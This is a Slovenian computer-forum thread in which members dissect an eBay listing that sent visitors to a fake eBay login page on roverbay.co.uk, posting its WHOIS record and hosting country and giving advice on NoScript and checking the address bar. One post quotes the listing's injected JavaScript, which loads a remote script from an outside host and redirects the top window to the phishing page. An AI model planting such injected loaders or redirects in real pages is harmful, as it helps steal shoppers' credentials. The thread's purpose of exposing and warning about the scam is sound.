Poglej prejšnjo temo :: Poglej naslednjo temo |
Avtor |
Sporočilo |
a.vidmar Član
Pridružen-a: Ned 08 Jul 2007 11:03 Prispevkov: 1138 Aktiv.: 5.56 Kraj: Postojna
|
|
Nazaj na vrh |
|
|
gumby Član
Pridružen-a: Sob 28 Apr 2007 12:32 Prispevkov: 4066 Aktiv.: 19.65
|
Objavljeno: Sre Mar 21, 2012 4:03 pm Naslov sporočila: |
|
|
Pošlji na ebay tole, po moje jih bo zanimalo...
_________________ Tule nisem več aktiven. |
|
Nazaj na vrh |
|
|
igo Član
Pridružen-a: Sre 11 Okt 2006 19:11 Prispevkov: 3638 Aktiv.: 17.04
|
Objavljeno: Sre Mar 21, 2012 5:17 pm Naslov sporočila: |
|
|
Tip zbira uporabniška imena in gesla.
Vsaj 30-krat sem se poskušal prijaviti s svojim ebay uporabniškim imenom: FACK in geslom OFF . Ne vem, zakaj tukaj ne deluje, če na ebayu deluje . Poskusite še vi. Morda bi moral A nadomestiti z U . Morda bi moral oboje prevesti v slovenščino ali kak drug jezik ... .
_________________ Teoretično je praksa posledica teorije, praktično je pa ravno obratno. (igo 2001)
LP, Igor |
|
Nazaj na vrh |
|
|
PPG78 Član
Pridružen-a: Ned 27 Jul 2003 14:09 Prispevkov: 2322 Aktiv.: 10.41 Kraj: Gorenjska
|
Objavljeno: Sre Mar 21, 2012 5:58 pm Naslov sporočila: |
|
|
Zanimivo, me zanima kako je naredil preusmeritev iz originalne ebay strani na fake stran. Drugače na fake strani kar nekaj zadev (linkov) ne deluje in bi se morale vsakemu prižgati rdeče lučke.
Drugače pa je domena "sveža"
Koda: |
Domain name:
roverbay.co.uk
Registrant:
Ulrich Winkel
Registrant type:
UK Individual
Registrant's address:
Lindelburger
Str. 25
Pyrbaum
90602
Germany
Registrar:
1 & 1 Internet AG [Tag = SCHLUND]
URL: http://www.1and1.co.uk or http://registrar.1und1.info
Relevant dates:
Registered on: 18-Mar-2012
Renewal date: 18-Mar-2014
Last updated: 18-Mar-2012
Registration status:
Registration request being processed.
Name servers:
ns65.1und1.de
ns66.1und1.de |
|
|
Nazaj na vrh |
|
|
Waldo Član
Pridružen-a: Pet 02 Nov 2007 10:50 Prispevkov: 316 Aktiv.: 1.57 Kraj: Maribor
|
Objavljeno: Sre Mar 21, 2012 6:42 pm Naslov sporočila: |
|
|
Server location: Republic of Moldova
Pa original avkcija je že potekla.
|
|
Nazaj na vrh |
|
|
a.vidmar Član
Pridružen-a: Ned 08 Jul 2007 11:03 Prispevkov: 1138 Aktiv.: 5.56 Kraj: Postojna
|
Objavljeno: Sre Mar 21, 2012 6:48 pm Naslov sporočila: |
|
|
Ni potekla, sem prijavil kot prevaro.
Avkcija se bi morala izteči okrog polnoči.
|
|
Nazaj na vrh |
|
|
xfce Član
Pridružen-a: Čet 28 Jul 2011 8:06 Prispevkov: 521 Aktiv.: 3.36
|
Objavljeno: Sre Mar 21, 2012 8:13 pm Naslov sporočila: |
|
|
Zanimivo!!
Čudno, da ebay dopusti izvajanje javascript kode...
Koda: |
<script type="text/javascript">
var
a = "SRC=";
b="http://jcmsale.elementfx.com/d48.[slovenščina je zame španska vas]";
c="</";
d="script";
document.write ("<script type='text/javascript'"+a+b+">"+c+d+">");
</script>
|
http://jcmsale.elementfx.com/d48.[slovenščina je zame španska vas]
Koda: |
window.top.location.href = "http://roverbay.co.uk/itm/Pioneer-Elite-Kuro-Signature-1080p-HD-Plasma-Television-PRO-101FD-50/230764535450/username/not";
|
|
|
Nazaj na vrh |
|
|
gregoral Član
Pridružen-a: Pet 24 Nov 2006 9:42 Prispevkov: 688 Aktiv.: 3.24 Kraj: Ljubljana
|
Objavljeno: Sre Mar 21, 2012 9:59 pm Naslov sporočila: |
|
|
No nekaj informacij za boljše razumevanje:
- ebay nima kontrole nad tem katera javascript koda se lahko izvaja v brskalniku uporabnika
- ebay ima dejansko kontrolo samo nad tem kaj servira iz svojih stežnikov
Dejstvo je da ebay posreduje "podatke" ki jih vnese prodajalec in jih servira obiskovalcem.
V večini primerov to pomeni da posreduje tekst in slike oziroma tudi povezave do slik.
Hekerji pa so zviti in kot "tekst" pošiljajo marsikaj (recimo javascript).
Ebay take vnose seveda filtrira, ampak kaj ko so hekerji zelo iznajdljivi in vedno najdejo način da spravijo razne zadeve na strežnik.
Problem je ker danes večina strani za polno funkcionlnost potrebuje javascript.
Še večji problem je ker ima večina brskalnikov javascript vklopljen, uporabniki pa ne vedo kaj to pomeni in kaj se jim lahko zgodi.
Če imaš star brskalnik ki ima okvarjeno kodo za prikaz slik, si ogrožen že če eden od ebay prodajalcev da na oglas sliko ki ima noter nebodigatreba.
Če se da uporabljajte brskalnike ki imajo NoScript (ali ekvivalenten) dodatek.
Ta onemogoča izvajanje javascript kode na straneh.
Jaz sem tako gledal originalno stran ko sem odprl link,
je pa res da če bi hotel licitirati bi moral javascript nazaj vklopit.
Vseeno pa lahko pogledam večino oglasov na ebay brez javascript-a.
Večina oglasov ki jih pogledamo ni zanimiva za nakup, zato jih takoj zapremo.
Torej:
- pri nakupih zelo pazite kaj piše v naslovni vrstici
- če vas ponovno sprašuje za password je treba ponovno pogledat na naslov strani
- če se da uporabljajte NoScript in imejte javascript izklopljen
- še dodatno zaščito pa nudi RequestPolicy ki onemogoča še slike ki niso iz istega strežnika
Res pa je da večina normalnih uporabnikov potem sprašuje:
Ja zakaj moram pa potem zmeraj javascript vklapljat?
A se ne nebi dalo tega kar izkopit?
Odprejo pa vse priponke ki jim jih pošljejo prijateljice in sodelavci in ...
Pri tem seveda tip priponke ni pomemben,
važno je le da takoj odprem SuperMineSweeper.exe, ker je menda zakon.
No bom nehal dolgovezit,
lp, Gregor
|
|
Nazaj na vrh |
|
|
. Član
Pridružen-a: Pon 23 Avg 2004 16:16 Prispevkov: 16777190 Aktiv.: 75239.17
|
Objavljeno: Sre Mar 21, 2012 10:16 pm Naslov sporočila: |
|
|
Brisana vsebina odstranjenega uporabnika.
|
|
Nazaj na vrh |
|
|
Srecko Član
Pridružen-a: Čet 25 Dec 2003 21:29 Prispevkov: 1006 Aktiv.: 4.51 Kraj: Okolica Cerkna
|
Objavljeno: Čet Mar 22, 2012 9:03 pm Naslov sporočila: |
|
|
Kako pa se v Firefoxsu izklopi ta javascript?
LP Srečko
_________________ Samouk
Tukaj sem doma |
|
Nazaj na vrh |
|
|
poule Član
Pridružen-a: Čet 11 Jan 2007 19:53 Prispevkov: 800 Aktiv.: 3.80 Kraj: Ljubljana
|
Objavljeno: Čet Mar 22, 2012 9:37 pm Naslov sporočila: |
|
|
Firefox ima dodatek "NoScript
noscript
|
|
Nazaj na vrh |
|
|
. Član
Pridružen-a: Pon 23 Avg 2004 16:16 Prispevkov: 16777190 Aktiv.: 75239.17
|
Objavljeno: Čet Mar 22, 2012 9:38 pm Naslov sporočila: |
|
|
Brisana vsebina odstranjenega uporabnika.
|
|
Nazaj na vrh |
|
|
kastaneda Član
Pridružen-a: Pet 23 Okt 2009 11:18 Prispevkov: 458 Aktiv.: 2.59
|
Objavljeno: Pet Mar 23, 2012 9:01 am Naslov sporočila: |
|
|
igo je napisal/a: |
Tip zbira uporabniška imena in gesla.
Vsaj 30-krat sem se poskušal prijaviti s svojim ebay uporabniškim imenom: FACK in geslom OFF . Ne vem, zakaj tukaj ne deluje... . |
Preverjanje imena na ebay-u:
https://signin.ebay.com/ws/eBayISAPI.dll
Preverjanje imena tukaj:
http://rroverbay.co.uk/ws/eBayISAPI.dll
Moldavijec ima verjetno "resne" namene...
_________________ LP
Srečko |
|
Nazaj na vrh |
|
|
lojzek Član
Pridružen-a: Pet 25 Jan 2008 8:00 Prispevkov: 3356 Aktiv.: 16.96
|
|
Nazaj na vrh |
|
|
elektronik1982 Član
Pridružen-a: Pet 18 Maj 2012 5:53 Prispevkov: 101 Aktiv.: 0.69 Kraj: Maribor
|
Objavljeno: Pet Jan 02, 2015 6:04 pm Naslov sporočila: |
|
|
lojzek: fyp.ebay.co.uk je ebay-eva poddomena. FYP morda pomeni 'forgot your password'. fyp.ebay.co.uk resolva v 66.135.209.105, kar so ebay-evi strezniki, tako da mislim, da te nima kaj skrbeti.
|
|
Nazaj na vrh |
|
|
|